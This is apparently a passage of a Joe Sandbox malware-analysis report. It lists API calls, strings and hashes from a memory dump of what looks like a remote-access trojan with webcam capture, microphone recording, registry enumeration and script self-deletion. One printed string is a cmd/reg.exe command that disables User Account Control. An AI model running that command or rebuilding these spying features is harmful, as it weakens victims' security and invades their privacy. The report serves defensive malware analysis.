                                      • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                                      • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                      • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                                      APIs
                                      • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                                      • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                                      • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                                      • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MetricsSystem
                                      • String ID: ]tA
                                      • API String ID: 4116985748-3517819141
                                      • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                      • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                                      • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                      • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                                      APIs
                                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                                      Strings
                                      • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreateProcess
                                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                      • API String ID: 2922976086-4183131282
                                      • Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                      • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
                                      • Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                      • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 0044085A
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 00440890
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                      • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
                                      • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                      • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405100
                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 0040510C
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405117
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405120
                                        • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                      Strings
                                      • Connection KeepAlive | Disabled, xrefs: 004050D9
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                      • String ID: Connection KeepAlive | Disabled
                                      • API String ID: 2993684571-3818284553
                                      • Opcode ID: 3c7acb05a4e0257c4243895fd0c0a32a1713874f0248c7c788b0d5ac90108107
                                      • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
                                      • Opcode Fuzzy Hash: 3c7acb05a4e0257c4243895fd0c0a32a1713874f0248c7c788b0d5ac90108107
                                      • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
                                      APIs
                                        • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
                                      • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
                                      • Sleep.KERNEL32(00002710), ref: 00418DBD
                                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: PlaySound$HandleLocalModuleSleepTime
                                      • String ID: Alarm triggered
                                      • API String ID: 614609389-2816303416
                                      • Opcode ID: f3b2e6a196e006c08730a50f46cf1091306eb2f4cb3f358d521c73ccadf31b21
                                      • Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
                                      • Opcode Fuzzy Hash: f3b2e6a196e006c08730a50f46cf1091306eb2f4cb3f358d521c73ccadf31b21
                                      • Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
                                      • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
                                      • Opcode Fuzzy Hash: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
                                      • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
                                      APIs
                                      • Sleep.KERNEL32(00000000,0040BE20), ref: 004044A4
                                        • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: H_prologSleep
                                      • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                      • API String ID: 3469354165-3547787478
                                      • Opcode ID: 93232aa8007a21a9389ca799ac839fc67a618bcc9e960cec28ef887a192cbaff
                                      • Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
                                      • Opcode Fuzzy Hash: 93232aa8007a21a9389ca799ac839fc67a618bcc9e960cec28ef887a192cbaff
                                      • Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E
                                      APIs
                                        • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                      • _free.LIBCMT ref: 00442318
                                      • _free.LIBCMT ref: 0044232F
                                      • _free.LIBCMT ref: 0044234E
                                      • _free.LIBCMT ref: 00442369
                                      • _free.LIBCMT ref: 00442380
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$AllocateHeap
                                      • String ID:
                                      • API String ID: 3033488037-0
                                      • Opcode ID: 1cb3f8468d83fa4b51ad4767ae85eb964ea8f2ce9cb50cf83adb64ec4114f07b
                                      • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
                                      • Opcode Fuzzy Hash: 1cb3f8468d83fa4b51ad4767ae85eb964ea8f2ce9cb50cf83adb64ec4114f07b
                                      • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
                                      APIs
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                      • _free.LIBCMT ref: 004468EC
                                        • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                        • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                      • _free.LIBCMT ref: 00446AB8
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                      • String ID:
                                      • API String ID: 1286116820-0
                                      • Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                      • Instruction ID: 7fd05a225221f517daf6149bd07272def0d2f8fc9e30777fa7538f83a84e5ba5
                                      • Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                      • Instruction Fuzzy Hash: 63511DB1900205ABEB10EF65DC8196A77BCEF42714B12027FE454A7291EBB89E44CB5E
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                      • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
                                      • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                      • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6), ref: 0044E359
                                      • __alloca_probe_16.LIBCMT ref: 0044E391
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?), ref: 0044E3E2
                                      • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?,00000002,00000000), ref: 0044E3F4
                                      • __freea.LIBCMT ref: 0044E3FD
                                        • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                      • String ID:
                                      • API String ID: 313313983-0
                                      • Opcode ID: cd44d6698c102d2af4edf97b65b02ba280a030654d2c9f96c5f73d04308e4ca0
                                      • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
                                      • Opcode Fuzzy Hash: cd44d6698c102d2af4edf97b65b02ba280a030654d2c9f96c5f73d04308e4ca0
                                      • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
                                      APIs
                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                                      • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                                      • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
                                      • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
                                      • waveInStart.WINMM ref: 00401CDE
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                      • String ID:
                                      • API String ID: 1356121797-0
                                      • Opcode ID: 283beb35d7bf44efdd4aecd2214bb6ae927bcff461a5de7ece881e3333be88c2
                                      • Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
                                      • Opcode Fuzzy Hash: 283beb35d7bf44efdd4aecd2214bb6ae927bcff461a5de7ece881e3333be88c2
                                      • Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                                        • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                                      • _free.LIBCMT ref: 0044C59F
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 4aac595f9ed8bece24bab84cc27b423baa4c6b615b6e2e749ab0ef35dcfe54a8
                                      • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
                                      • Opcode Fuzzy Hash: 4aac595f9ed8bece24bab84cc27b423baa4c6b615b6e2e749ab0ef35dcfe54a8
                                      • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00469654,00000000,00000000,0040BFB7,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041A1BA
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041A1D7
                                      • CloseHandle.KERNEL32(00000000), ref: 0041A1E3
                                      • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041A1F4
                                      • CloseHandle.KERNEL32(00000000), ref: 0041A201
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreatePointerWrite
                                      • String ID:
                                      • API String ID: 1852769593-0
                                      • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                      • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
                                      • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                      • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                                      • int.LIBCPMT ref: 0040FBE8
                                        • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                        • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                      • std::_Facet_Register.LIBCPMT ref: 0040FC28
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                      • String ID:
                                      • API String ID: 2536120697-0
                                      • Opcode ID: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
                                      • Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
                                      • Opcode Fuzzy Hash: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
                                      • Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8
                                      APIs
                                      • GetLastError.KERNEL32(?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004457AE
                                      • _free.LIBCMT ref: 004457E3
                                      • _free.LIBCMT ref: 0044580A
                                      • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445817
                                      • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445820
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
                                      • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                                      • Opcode Fuzzy Hash: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
                                      • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D
                                      APIs
                                      • _free.LIBCMT ref: 0044DBB4
                                        • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                        • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                      • _free.LIBCMT ref: 0044DBC6
                                      • _free.LIBCMT ref: 0044DBD8
                                      • _free.LIBCMT ref: 0044DBEA
                                      • _free.LIBCMT ref: 0044DBFC
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                      • Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
                                      • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                      • Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C
                                      APIs
                                      • _free.LIBCMT ref: 00441566
                                        • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                        • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                      • _free.LIBCMT ref: 00441578
                                      • _free.LIBCMT ref: 0044158B
                                      • _free.LIBCMT ref: 0044159C
                                      • _free.LIBCMT ref: 004415AD
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                      • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
                                      • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                      • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
                                      APIs
                                      • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Enum$InfoQueryValue
                                      • String ID: [regsplt]
                                      • API String ID: 3554306468-4262303796
                                      • Opcode ID: a148dc03fe6faf0a0226ee5150a80861f05f6496db0e2f86d484e137917f6fe9
                                      • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
                                      • Opcode Fuzzy Hash: a148dc03fe6faf0a0226ee5150a80861f05f6496db0e2f86d484e137917f6fe9
                                      • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
                                      APIs
                                      • _strpbrk.LIBCMT ref: 0044B918
                                      • _free.LIBCMT ref: 0044BA35
                                        • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,004050E3,?,00000000,00000000,00402086,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
                                        • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417,?,004050E3), ref: 00439AC7
                                        • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000,?,004050E3), ref: 00439ACE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                      • String ID: *?$.
                                      • API String ID: 2812119850-3972193922
                                      • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                      • Instruction ID: d7c010aeaec7a8a897f36992f2f7f2874d2ac4fe7d304ea8792e53e8e447d7e7
                                      • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                      • Instruction Fuzzy Hash: 9C51C371E002099FEF14DFA9C881AAEB7B5EF48314F24816EE954E7301E779DE018B94
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __alloca_probe_16__freea
                                      • String ID: H"G$H"GH"G
                                      • API String ID: 1635606685-3036711414
                                      • Opcode ID: e2e3cca706edb79a852b9ee6f10956c62f062633488338ea1caae12a9919ff4a
                                      • Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
                                      • Opcode Fuzzy Hash: e2e3cca706edb79a852b9ee6f10956c62f062633488338ea1caae12a9919ff4a
                                      • Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 0040189E
                                      • ExitThread.KERNEL32 ref: 004018D6
                                      • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                                        • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                      • String ID: 8:G
                                      • API String ID: 1649129571-405301104
                                      • Opcode ID: 3d01ea3b0cab7fa808a72f389b8754f11d95393c5559e3221ed91eca77b9dce3
                                      • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
                                      • Opcode Fuzzy Hash: 3d01ea3b0cab7fa808a72f389b8754f11d95393c5559e3221ed91eca77b9dce3
